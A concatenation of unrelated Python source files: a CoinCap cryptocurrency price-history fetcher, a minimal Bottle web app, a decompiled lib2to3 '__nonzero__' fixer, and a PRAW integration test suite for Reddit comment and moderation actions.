raise Exception(f'Asset with symbol {symbol} not found in the provided list.')
return filtered_assets
def get_series(currency_id: str, interval: str) -> pd.DataFrame:
""" Get the time series for the given currency_id. Timestamps and dates are given in UTC time. """
url = f"https://api.coincap.io/v2/assets/{currency_id}/history"
js = request_and_jsonize_calm(url, params={'interval': interval})
times, prices, dates = [], [], []
for measurement in js['data']:
timestamp_seconds = float(measurement['time']) // 1000
times.append(timestamp_seconds) # Timestamp is in milliseconds
prices.append(float(measurement['priceUsd']))
dates.append(datetime.fromtimestamp(timestamp_seconds))
df = pd.DataFrame(
{
'date': dates,
'time': times,
'price': prices
}
)
return df
def get_assets(symbols: List[str], search_limit: int = 100) -> Tuple:
""" Get the dataframes of the wanted assets, specified as symbols in the symbols list. """
# 1) Get the available assets up to the specified limit
assets = get_available_assets(search_limit)
# 2) Filter out the wanted assets
try:
filtered_assets = filter_by_symbol(assets, symbols)
except Exception as e:
raise e # We may be wanting to do something about that
# 3) For every selected asset, return its dataframe
to_return = []
for asset in filtered_assets:
time.sleep(5)
series = get_series(asset['id'], 'd1') # With d1 as interval, we select daily prices
to_return.append(Asset(asset['symbol'], series))
return tuple(to_return)
|
from bottle import route, default_app
@route("/")
def hello():
return 'hello world!!'
application = default_app()
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: fix_nonzero.py
"""Fixer for __nonzero__ -> __bool__ methods."""
from .. import fixer_base
from ..fixer_util import Name, syms
class FixNonzero(fixer_base.BaseFix):
BM_compatible = True
PATTERN = "\n classdef< 'class' any+ ':'\n suite< any*\n funcdef< 'def' name='__nonzero__'\n parameters< '(' NAME ')' > any+ >\n any* > >\n "
def transform(self, node, results):
name = results['name']
new = Name('__bool__', prefix=name.prefix)
name.replace(new) |
import mock
import pytest
from praw.exceptions import ClientException, PRAWException, RedditAPIException
from praw.models import Comment, Submission
from ... import IntegrationTest
class TestComment(IntegrationTest):
def test_attributes(self):
with self.recorder.use_cassette("TestComment.test_attributes"):
comment = Comment(self.reddit, "cklhv0f")
assert comment.author == "bboe"
assert comment.body.startswith("Yes it does.")
assert not comment.is_root
assert comment.submission == "2gmzqe"
@mock.patch("time.sleep", return_value=None)
def test_block(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_block"):
comment = None
for item in self.reddit.inbox.submission_replies():
if item.author and item.author != pytest.placeholders.username:
comment = item
break
else:
assert False, "no comment found"
comment.block()
def test_clear_vote(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_clear_vote"):
Comment(self.reddit, "d1680wu").clear_vote()
@mock.patch("time.sleep", return_value=None)
def test_delete(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_delete"):
comment = Comment(self.reddit, "d1616q2")
comment.delete()
assert comment.author is None
assert comment.body == "[deleted]"
def test_disable_inbox_replies(self):
self.reddit.read_only = False
comment = Comment(self.reddit, "dcc9snh")
with self.recorder.use_cassette(
"TestComment.test_disable_inbox_replies"
):
comment.disable_inbox_replies()
def test_downvote(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_downvote"):
Comment(self.reddit, "d1680wu").downvote()
@mock.patch("time.sleep", return_value=None)
def test_edit(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_edit"):
comment = Comment(self.reddit, "d1616q2")
comment.edit("New text")
assert comment.body == "New text"
def test_enable_inbox_replies(self):
self.reddit.read_only = False
comment = Comment(self.reddit, "dcc9snh")
with self.recorder.use_cassette(
"TestComment.test_enable_inbox_replies"
):
comment.enable_inbox_replies()
def test_gild__no_creddits(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_gild__no_creddits"):
with pytest.raises(RedditAPIException) as excinfo:
Comment(self.reddit, "d1616q2").gild()
exception = excinfo.value
assert "INSUFFICIENT_CREDDITS" == exception.error_type
def test_invalid(self):
with self.recorder.use_cassette("TestComment.test_invalid"):
with pytest.raises(PRAWException) as excinfo:
Comment(self.reddit, "0").body
assert excinfo.value.args[0].startswith(
"No data returned for comment"
)
@mock.patch("time.sleep", return_value=None)
def test_mark_read(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_mark_read"):
comment = next(self.reddit.inbox.unread())
assert isinstance(comment, Comment)
comment.mark_read()
@mock.patch("time.sleep", return_value=None)
def test_mark_unread(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_mark_unread"):
comment = next(self.reddit.inbox.comment_replies())
comment.mark_unread()
def test_parent__comment(self):
comment = Comment(self.reddit, "cklhv0f")
with self.recorder.use_cassette("TestComment.test_parent__comment"):
parent = comment.parent()
parent.refresh()
assert comment in parent.replies
assert isinstance(parent, Comment)
assert parent.fullname == comment.parent_id
def test_parent__chain(self):
comment = Comment(self.reddit, "dkk4qjd")
counter = 0
with self.recorder.use_cassette("TestComment.test_parent__chain"):
comment.refresh()
parent = comment.parent()
while parent != comment.submission:
if counter % 9 == 0:
parent.refresh()
counter += 1
parent = parent.parent()
def test_parent__comment_from_forest(self):
submission = self.reddit.submission("2gmzqe")
with self.recorder.use_cassette(
"TestComment.test_parent__comment_from_forest"
):
comment = submission.comments[0].replies[0]
parent = comment.parent()
assert comment in parent.replies
assert isinstance(parent, Comment)
assert parent.fullname == comment.parent_id
@mock.patch("time.sleep", return_value=None)
def test_parent__from_replies(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.parent__from_replies"):
comment = next(self.reddit.inbox.comment_replies())
parent = comment.parent()
assert isinstance(parent, Comment)
assert parent.fullname == comment.parent_id
def test_parent__submission(self):
comment = Comment(self.reddit, "cklfmye")
with self.recorder.use_cassette("TestComment.test_parent__submission"):
parent = comment.parent()
assert comment in parent.comments
assert isinstance(parent, Submission)
assert parent.fullname == comment.parent_id
def test_refresh(self):
comment = Comment(self.reddit, "d81vwef")
with self.recorder.use_cassette("TestComment.test_refresh"):
assert len(comment.replies) == 0
comment.refresh()
assert len(comment.replies) > 0
def test_refresh__raises_exception(self):
with self.recorder.use_cassette(
"TestComment.test_refresh__raises_exception"
):
with pytest.raises(ClientException) as excinfo:
Comment(self.reddit, "d81vwef").refresh()
assert (
"This comment does not appear to be in the comment tree",
) == excinfo.value.args
def test_refresh__twice(self):
with self.recorder.use_cassette("TestComment.test_refresh__twice"):
Comment(self.reddit, "d81vwef").refresh().refresh()
def test_refresh__deleted_comment(self):
with self.recorder.use_cassette(
"TestComment.test_refresh__deleted_comment"
):
with pytest.raises(ClientException) as excinfo:
Comment(self.reddit, "d7ltvl0").refresh()
assert (
"This comment does not appear to be in the comment tree",
) == excinfo.value.args
def test_refresh__removed_comment(self):
with self.recorder.use_cassette(
"TestComment.test_refresh__removed_comment"
):
with pytest.raises(ClientException) as excinfo:
Comment(self.reddit, "dma3mi5").refresh()
assert (
"This comment does not appear to be in the comment tree",
) == excinfo.value.args
def test_refresh__with_reply_sort_and_limit(self):
with self.recorder.use_cassette(
"TestComment.test_refresh__with_reply_sort_and_limit"
):
comment = Comment(self.reddit, "e4j4830")
comment.reply_limit = 4
comment.reply_sort = "new"
comment.refresh()
replies = comment.replies
last_created = float("inf")
for reply in replies:
if isinstance(reply, Comment):
if reply.created_utc > last_created:
assert False, "sort order incorrect"
last_created = reply.created_utc
assert len(comment.replies) == 3
def test_reply(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_reply"):
parent_comment = Comment(self.reddit, "d1616q2")
comment = parent_comment.reply("Comment reply")
assert comment.author == self.reddit.config.username
assert comment.body == "Comment reply"
assert not comment.is_root
assert comment.parent_id == parent_comment.fullname
def test_reply__none(self):
self.reddit.read_only = False
comment = Comment(self.reddit, "eear2ml")
with self.recorder.use_cassette("TestComment.test_reply__none"):
reply = comment.reply("TEST")
assert reply is None
def test_report(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_report"):
Comment(self.reddit, "d0335z3").report("custom")
def test_save(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_save"):
Comment(self.reddit, "d1680wu").save("foo")
def test_unsave(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_unsave"):
Comment(self.reddit, "d1680wu").unsave()
def test_upvote(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestComment.test_upvote"):
Comment(self.reddit, "d1680wu").upvote()
class TestCommentModeration(IntegrationTest):
def test_approve(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestCommentModeration.test_approve"):
Comment(self.reddit, "da2g5y6").mod.approve()
def test_distinguish(self):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_distinguish"
):
Comment(self.reddit, "da2g5y6").mod.distinguish()
@mock.patch("time.sleep", return_value=None)
def test_distinguish__sticky(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_distinguish__sticky"
):
Comment(self.reddit, "da2g5y6").mod.distinguish(sticky=True)
def test_ignore_reports(self):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_ignore_reports"
):
self.reddit.comment("da2g5y6").mod.ignore_reports()
def test_lock(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestCommentModeration.test_lock"):
Comment(self.reddit, "da2g6ne").mod.lock()
def test_remove(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestCommentModeration.test_remove"):
self.reddit.comment("da2g5y6").mod.remove(spam=True)
@mock.patch("time.sleep", return_value=None)
def test_remove_with_reason_id(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_remove_with_reason_id"
):
self.reddit.comment("f3dm3b7").mod.remove(
reason_id="110nhral8vygf"
)
def test_show(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestCommentModeration.test_show"):
self.reddit.comment("fjyyrv6").mod.show()
def test_unlock(self):
self.reddit.read_only = False
with self.recorder.use_cassette("TestCommentModeration.test_unlock"):
Comment(self.reddit, "da2g6ne").mod.unlock()
@mock.patch("time.sleep", return_value=None)
def test_add_removal_reason(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_add_removal_reason"
):
comment = self.reddit.comment("f98ukt5")
comment.mod.remove()
comment.mod._add_removal_reason(
mod_note="Blah", reason_id="110nhral8vygf"
)
@mock.patch("time.sleep", return_value=None)
def test_add_removal_reason_without_id(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_add_removal_reason_without_id"
):
comment = self.reddit.comment("f98ugot")
comment.mod.remove()
comment.mod._add_removal_reason(mod_note="Test")
@mock.patch("time.sleep", return_value=None)
def test_add_removal_reason_without_id_or_note(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_add_removal_reason_invalid"
):
with pytest.raises(ValueError) as excinfo:
comment = self.reddit.comment("f9974ce")
comment.mod.remove()
comment.mod._add_removal_reason()
assert excinfo.value.args[0].startswith("mod_note cannot be blank")
@mock.patch("time.sleep", return_value=None)
def test_send_removal_message(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_send_removal_message"
):
comment = self.reddit.comment("edu698v")
mod = comment.mod
mod.remove()
message = "message"
res = [
mod.send_removal_message(message, "title", type)
for type in ("public", "private", "private_exposed")
]
assert isinstance(res[0], Comment)
assert res[0].parent_id == "t1_" + comment.id
assert res[0].body == message
assert res[1] is None
assert res[2] is None
@mock.patch("time.sleep", return_value=None)
def test_send_removal_message__error(self, _):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_send_removal_message__error"
):
comment = self.reddit.comment("fkmrn4a")
comment.mod.remove()
with pytest.raises(RedditAPIException) as excinfo:
comment.mod.send_removal_message("message", "a" * 51)
exception = excinfo.value
assert "title" == exception.field
assert "TOO_LONG" == exception.error_type
def test_undistinguish(self):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_undistinguish"
):
self.reddit.comment("da2g5y6").mod.undistinguish()
def test_unignore_reports(self):
self.reddit.read_only = False
with self.recorder.use_cassette(
"TestCommentModeration.test_unignore_reports"
):
self.reddit.comment("da2g5y6").mod.unignore_reports()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.